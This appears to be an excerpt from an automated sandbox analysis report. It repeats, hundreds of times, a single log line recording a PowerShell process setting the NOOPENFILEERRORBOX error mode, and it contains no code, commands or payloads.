                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
